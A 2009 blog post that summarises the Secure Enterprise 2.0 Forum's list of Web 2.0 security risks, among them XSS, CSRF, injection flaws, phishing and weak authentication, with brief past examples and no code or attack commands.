Friday, November 6, 2009

Web 2.0 drawbacks

As per the Secure Enterprise 2.0 Forum following are the most vulnerable things for Web2.0
1) Information Leakage
Web 2.0 combined with our "work-from-anywhere" lifestyle has begun to blur the lines between work and private life. Because of this psychological shift, people may inadvertently share information their employer would have considered sensitive. Even if individuals aren't sharing the equivalent of trade secrets, the accumulation of the small "non-sensitive" items they share can allow a business's competitors to gain intelligence about what's going on and being worked on at that company.

2) Phishing Although phishing isn't just a risk associated with Web 2.0 technologies by any means, the multitude of dissimilar client software in use makes it harder for consumers to distinguish between the genuine and the fake web sites. That enables more effective phishing attacks.

3) Cross Site Scripting (XSS) In a stored cross site scripting (XSS) vulnerability, malicious input sent by an attacker is stored in the system then displayed to other users. Systems that allow users to input formatted content - like HTML for example - are especially susceptible to this attack. At risk are blogs, social networks, and wikis. An example of this attack from last year was the Yahoo HotJobs XSS vulnerability exploit, where hackers used JavaScript to steal session cookies of victims. Last year and in previous years, XSS worms were also to blame for attacks on Orkut, MySpace etc.

4) Cross Site Request Forgery (CSRF) In CSRFs, victim visit what appear to be innocent-looking web sites, but which contain malicious code which generates requests to a different site instead. Due to heavy use of AJAX, Web 2.0 applications are potentially more vulnerable to this type of attack. In legacy apps, most user-generated requests produced a visual effect on the screen, making CSRF easier to spot. Web 2.0 systems' lack of visual feedback make this attack less apparent. A recent example of a CSRF involved a vulnerability in Twitter in which site owners could get the Twitter profiles of their visitors.
5) Insufficient Authentication Controls
In many Web 2.0 applications, content is trusted in the hands of many users, not just a select number of authorized personnel. That means there's a greater chance that a less-experienced user will make a change that will negatively affect the overall system. This change in a system's design can also be exploited by hackers who now have access to a greater number of "administrative" accounts whose passwords can often be easily cracked if the correct security controls are not in place. The systems also may have insufficient brute-force controls, permit clear text passwords, or have been tied together in a single-sign-on environment, making an attack that much riskier.
7) Injection Flaws Web 2.0 technologies tend to be vulnerable to new types of injection attacks including XML injection, XPath injection, JavaScript injection, and JSON injection for no other reason beyond the fact that the Web 2.0 applications tend to use and rely on those technologies. With increased use, comes increased risk. In addition, because Web 2.0 apps often rely on client side code, they more often perform some client-side input validation which an attacker can bypass.
8) Information Integrity Data integrity is one of the key elements of data security. Although a hack could lead to loss of integrity, so can unintentional misinformation. A great example of this in the public arena is a mistaken edit on Wikipedia which is then accepted as fact by many of the site's visitors. In a business environment, having systems open to many users allows a malicious or mistaken user or users to post and publish inaccurate information which destroys the integrity of the data.
9) Insufficient Anti-automation Programmatic interfaces of Web 2.0 applications let hackers automate attacks easier. In addition to brute force and CSRF attacks, other examples include the automated retrieval of a large amount of information and the automated opening of accounts. Anti-automation mechanisms like Captchas can help slow down or thwart these types of attacks.

No comments:

Post a Comment


Obstacles are those frightful things you see when you take your eyes off your goal.------> by Henry Ford